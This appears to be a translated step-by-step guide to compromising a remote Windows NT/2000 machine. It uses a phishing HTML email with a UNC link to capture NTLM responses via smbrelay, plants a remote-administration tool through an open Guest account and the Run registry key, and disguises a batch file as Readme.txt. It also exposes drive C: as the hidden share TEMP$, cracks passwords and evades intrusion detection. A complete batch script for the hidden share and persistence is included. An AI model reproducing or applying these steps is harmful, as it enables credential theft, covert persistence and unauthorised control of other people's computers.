You will need
- a packet sniffer;
- the smbrelay utility;
- a password-recovery (cracking) utility.
Send an e-mail in HTML format to the administrator of the remote computer. In the message, place a link, for example an image reference, that points to a share on your own computer (a UNC path of the form \\yourhost\share\image.gif). When the administrator's e-mail client renders the message, it will try to open the file on that shared resource and will authenticate to your computer over SMB. While that connection is being made, use the smbrelay utility to capture the LanMan hash. Strictly speaking, what the client sends is the LM/NTLM challenge-response rather than the stored hash, but it can be cracked offline in the same way; the sniffer is useful for confirming that the connection actually arrives.
If the built-in Guest account is not disabled (and, accordingly, remote access to the registry is permitted), copy a remote-administration program into a shared folder that allows file writes. Then, under the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run, create a value whose data is the path to that program; it will be started the next time the user logs on. Note that HKCU is per user, so the value must be written under the hive of a user who actually logs on to the machine, and writing it remotely requires that the remote registry service accept the Guest credentials.
To plant the remote-administration tool, exploit the Windows Explorer flaw in the handling of file extensions: create a batch file whose name Explorer displays as Readme.txt (for example Readme.txt.bat, since Explorer hides known extensions by default), and have it create a shared resource giving full access to drive C:. Give the share a name that will not arouse suspicion, for example TEMP$; the trailing $ also keeps it out of browse lists. The executable file thus appears to have a .txt extension, and the program for remote computer management is placed in the same folder.
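The batch file described in the two steps above (share the drive under a hidden name, register the tool under the Run key), written out as an added example; this is not code from the original article. The share name TEMP$, the working folder C:\TEMP, the value name Updater and the tool file name radmin.exe are assumptions, and the tool is assumed to have been copied into C:\TEMP already.

```batch
@echo off
rem Added example, not from the original article. Names below are assumptions:
rem share TEMP$, working folder C:\TEMP, tool radmin.exe, Run value "Updater".

rem 1. Share drive C: under an inconspicuous hidden name. The trailing $ keeps
rem    the share out of browse lists, but it is still reachable as \\host\TEMP$.
rem    On Windows NT/2000 a newly created share defaults to Everyone: Full Control,
rem    so no explicit permission switch is needed here.
net share TEMP$=C:\ /unlimited /remark:"Temporary files" >nul 2>&1

rem 2. Persistence: start the remote-administration tool (assumed to be at
rem    C:\TEMP\radmin.exe) at each logon of the current user. The .reg file is
rem    imported silently with regedit /s; backslashes are doubled because .reg
rem    string values use C-style escapes. Redirections are written before the
rem    echo text so that no trailing space ends up in the file.
set REGFILE=%TEMP%\run.reg
>%REGFILE% echo REGEDIT4
>>%REGFILE% echo.
>>%REGFILE% echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
>>%REGFILE% echo "Updater"="C:\\TEMP\\radmin.exe"
regedit /s %REGFILE%
del %REGFILE%

rem 3. Quick check that the share now exists (prints its path and permissions).
net share TEMP$
```

The Run value takes effect at the next logon of the user whose HKCU hive it was written to. The default share permission of Everyone: Full Control applies to NT/2000 only; on Windows XP SP1 and later a new share defaults to Everyone: Read, so there the share permissions would have to be changed explicitly. `net share TEMP$ /delete` removes the share again.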
To find out the administrator password of a computer running Windows NT/2000, use one of the password-recovery utilities: NAT, RedShadow, Brutus-AE or any other that is freely available on the Internet. Passwords can be attacked either with a dictionary or by brute force. Brute force is the more thorough of the two, since it will eventually find any password within the character set and length it tries, while a dictionary attack is far quicker when the password is a common word. LanMan hashes in particular are weak targets: the password is upper-cased, padded to 14 characters and hashed as two independent 7-character halves, so each half can be brute-forced separately.
When taking steps to obtain someone's password, remember that your actions may be monitored: online guessing in particular may be recorded as failed-logon events (if logon auditing is enabled) and may trigger account lockout. Use special techniques for evading intrusion-detection systems accordingly.
Before running password-recovery software against the remote computer, find out which operating system it is running and how it is set up; OS-fingerprinting programs such as queso and nmap can do this.